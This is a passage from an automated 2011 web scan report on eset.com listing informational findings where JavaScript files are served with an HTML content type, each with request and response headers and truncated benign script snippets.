Referer: http://www.eset.com/us/business/products
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1303045213|session#1303045152447-372951#1303047013|PC#1303045152447-372951.17#1304254757; __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; s_pers=%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_visit%3D1%7C1303046964931%3B%20gpv_pageName%3Dus/company%7C1303046964935%3B%20s_nr%3D1303045164939-New%7C1334581164939%3B%20s_invisit%3Dtrue%7C1303046964942%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Sun, 17 Apr 2011 14:46:20 GMT
X-Varnish: 1858248062
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 2557

var ESET_Business = {
init: function() {
// check for product dropdowns
if($('business_dropdown_eav')) {
this.setProductDropdown('eav');
}
if($('business_dropdown_eavmac'
...[SNIP]...

8.2. http://www.eset.com/us/scripts/elqNow/elqCfg.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/scripts/elqNow/elqCfg.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/elqNow/elqCfg.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/online-scanner
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=berki2oh2eh89hcmnibdtt6du1

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Sun, 17 Apr 2011 12:54:49 GMT
X-Varnish: 1857985774
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 3070

//------------------------------------------------------
// Copyright Eloqua Corporation.
//
var elqSiteID = '2208';
var elqVer = 'v200';
//
var elqERoot = 'now.eloqua.com/';
var elqSecERoot =
...[SNIP]...

8.3. http://www.eset.com/us/scripts/elqNow/elqImg.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/scripts/elqNow/elqImg.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/elqNow/elqImg.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/online-scanner
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=berki2oh2eh89hcmnibdtt6du1

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Sun, 17 Apr 2011 12:54:50 GMT
X-Varnish: 1857985841
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 894

// Copyright Eloqua Corporation.
var elqWDt = new Date(20020101);
var elqDt = new Date();
var elqMs = elqDt.getMilliseconds();
var elqTzo = elqWDt.getTimezoneOffset();
var elqRef2 = '';
if (type
...[SNIP]...

8.4. http://www.eset.com/us/scripts/lib/autocompleter/Autocompleter.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/scripts/lib/autocompleter/Autocompleter.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/lib/autocompleter/Autocompleter.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/online-scanner
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=berki2oh2eh89hcmnibdtt6du1

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Sun, 17 Apr 2011 12:54:49 GMT
X-Varnish: 1857985767
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 10881

var Observer=new Class({Implements:[Options,Events],options:{periodical:false,delay:1000},initialize:function(c,a,b){this.element=$(c)||$$(c);this.addEvent("onFired",a);this.setOptions(b);this.bound=t
...[SNIP]...

8.5. http://www.eset.com/us/scripts/lib/mbox.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/scripts/lib/mbox.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/lib/mbox.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/company
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=berki2oh2eh89hcmnibdtt6du1; __utmz=1.1303044897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.379079516.1303044897.1303044897.1303044897.1; __utmc=1; __utmb=1.1.10.1303044897; s_pers=%20s_visit%3D1%7C1303046697136%3B%20gpv_pageName%3Dus/online-scanner%7C1303046697139%3B%20s_nr%3D1303044897141-New%7C1334580897141%3B%20s_vnum%3D1334580897143%2526vn%253D1%7C1334580897143%3B%20s_invisit%3Dtrue%7C1303046697143%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Sun, 17 Apr 2011 12:59:10 GMT
X-Varnish: 1857995530
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 20200

var mboxCopyright = "&copy; 1996-2008. Omniture, Inc. All rights reserved.";mboxUrlBuilder = function(a, b) { this.a = a; this.b = b; this.c = new Array(); this.d = function(e) { return e; }; this.f =
...[SNIP]...

8.6. http://www.eset.com/us/scripts/lib/mootools-1.2.3-core-yc.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/scripts/lib/mootools-1.2.3-core-yc.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/lib/mootools-1.2.3-core-yc.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/online-scanner
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=berki2oh2eh89hcmnibdtt6du1

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Sun, 17 Apr 2011 12:54:49 GMT
X-Varnish: 1857985765
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 66610

//MooTools, <http://mootools.net>, My Object Oriented (JavaScript) Tools. Copyright (c) 2006-2009 Valerio Proietti, <http://mad4milk.net>, MIT Style License.

var MooTools={version:"1.2.3",build:"4980
...[SNIP]...

8.7. http://www.eset.com/us/scripts/lib/s_code3.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/scripts/lib/s_code3.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/lib/s_code3.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/online-scanner
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=berki2oh2eh89hcmnibdtt6du1

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Sun, 17 Apr 2011 12:54:49 GMT
X-Varnish: 1857985783
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 80333


/* SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com */
/************************ ADDITIONAL FEATURES ***********
...[SNIP]...

8.8. http://www.eset.com/us/scripts/online-scanner.js  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/scripts/online-scanner.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/online-scanner.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/online-scanner
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=berki2oh2eh89hcmnibdtt6du1

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Sun, 17 Apr 2011 12:54:49 GMT
X-Varnish: 1857985766
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 890

var ESET_Scanner = {

init: function() {
this.attachRunEvent();
this.attachIAgreeEvent();
},

attachRunEvent: function() {
if($('run-scanner')) {
$('run-scanner').addEvent('cli
...[SNIP]...

Report generated by XSS.CX at Sun Apr 17 09:47:55 CDT 2011.